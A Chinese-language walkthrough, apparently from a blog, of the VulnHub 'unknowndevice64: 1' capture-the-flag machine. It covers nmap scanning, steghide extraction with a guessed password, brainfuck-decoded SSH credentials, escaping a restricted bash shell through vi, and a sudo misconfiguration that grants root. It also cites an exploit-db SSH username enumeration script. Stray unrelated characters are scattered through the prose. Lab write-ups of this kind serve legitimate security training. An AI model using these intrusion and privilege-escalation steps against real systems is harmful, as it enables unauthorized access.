[unknowndevice64: 1]下載地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/
target：獲取機(jī)器root權(quán)限，查看/root/flag.txt

1.鏡像本間導(dǎo)入VMware智末；（nat模式,鏡像默認(rèn)啟用DHCP温学，kaili也在同網(wǎng)段（192.168.80.0/24））；
2.掃描網(wǎng)段，獲取靶機(jī)IP

root@kali:/home/ud64# nmap -sn 192.168.80.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 01:43 EDT
Nmap scan report for 192.168.80.1
Host is up (0.00042s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.134
Host is up (0.0011s latency).
MAC Address: 00:0C:29:D4:9F:79 (VMware)
Nmap scan report for 192.168.80.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:EA:7D:F3 (VMware)
Nmap scan report for 192.168.80.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 7.97 seconds

3.nmap掃描靶機(jī)氓奈，查看活動(dòng)端口

root@kali:/home/ud64# nmap -p- -sS -sV 192.168.80.134                    
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 00:00 EDT
Nmap scan report for 192.168.80.134
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
1337/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
MAC Address: 00:0C:29:D4:9F:79 (VMware)

顯示靶機(jī)ssh端口為1337，另外靶機(jī)為http server瞬欧，端口為31337；
4.web登錄192.168.80.134:31337,開發(fā)者模式查看網(wǎng)頁源碼罢防；
看到如下文件key_is_h1dd3n.jpg艘虎，提示key藏在這個(gè)jpg圖片中；

image.png

root@kali:/home/ud64# apt-get install steghide    #非kali自帶，安裝steghide
root@kali:/home/ud64# steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n     #steghide解密要使用原來加密使用的密碼恬叹，密碼根據(jù)圖片名字猜測候生，運(yùn)氣不錯(cuò)h1dd3n是密碼
wrote extracted data to "h1dd3n.txt".
root@kali:/home/ud64# cat h1dd3n.txt   #查看解密文件
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.

6.文件信息為一種brainfuck的程序語言，使用在線工具可解https://copy.sh/brainfuck/绽昼，在線解密后即可獲取到ssh的用戶名和密碼唯鸭；
7.登錄靶機(jī)ssh ****@192.168.80.134 -p 1337(為不劇透，隱去了登錄用戶名)
8.登錄發(fā)現(xiàn)為非root用戶绪励，需要提權(quán)

ud64@unknowndevice64_v1:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
ud64@unknowndevice64_v1:~$ sudo -l
-rbash: sudo: command not found

9.按兩次tab鍵肿孵，顯示目前用戶可執(zhí)行的命令

ud64@unknowndevice64_v1:~$ 
!          ]]         builtin    compgen    date       done       esac       false      function   id         let        mc         read       set        test       true       unalias    while      
./         alias      caller     complete   declare    echo       eval       fc         getopts    if         local      popd       readarray  shift      then       type       unset      whoami     
:          bg         case       compopt    dirs       elif       exec       fg         hash       in         logout     printf     readonly   shopt      time       typeset    until      {          
[          bind       cd         continue   disown     else       exit       fi         help       jobs       ls         pushd      return     source     times      ulimit     vi         }          
[[         break      command    coproc     do         enable     export     for        history    kill       mapfile    pwd        select     suspend    trap       umask      wait

發(fā)現(xiàn)可以使用vi，通過vi可以突破受限的shell

image.png

sh-4.4$ export PATH=/bin:/usr/bin:$PATH    #修改環(huán)境變量
sh-4.4$ cat flagRoot.txt     #這步已經(jīng)可以查看flag文件了
sh-4.4$ sudo -l                  #這里可以發(fā)現(xiàn)一個(gè)有趣的東西疏魏，通過/usr/bin/sysud64可以執(zhí)行任何root權(quán)限的命令
User ud64 may run the following commands on unknowndevice64_v1:
    (ALL) NOPASSWD: /usr/bin/sysud64

使用到的工具：
nmap
steghide 開源隱寫程序
brainfuck 程序語言
ssh用戶名枚舉（https://www.exploit-db.com/exploits/45939
）代碼35行需要修改sock.connect((args.target, int(args.port)))使用方式python ssh_enum_user.py -p 1337 192.168.80.134 root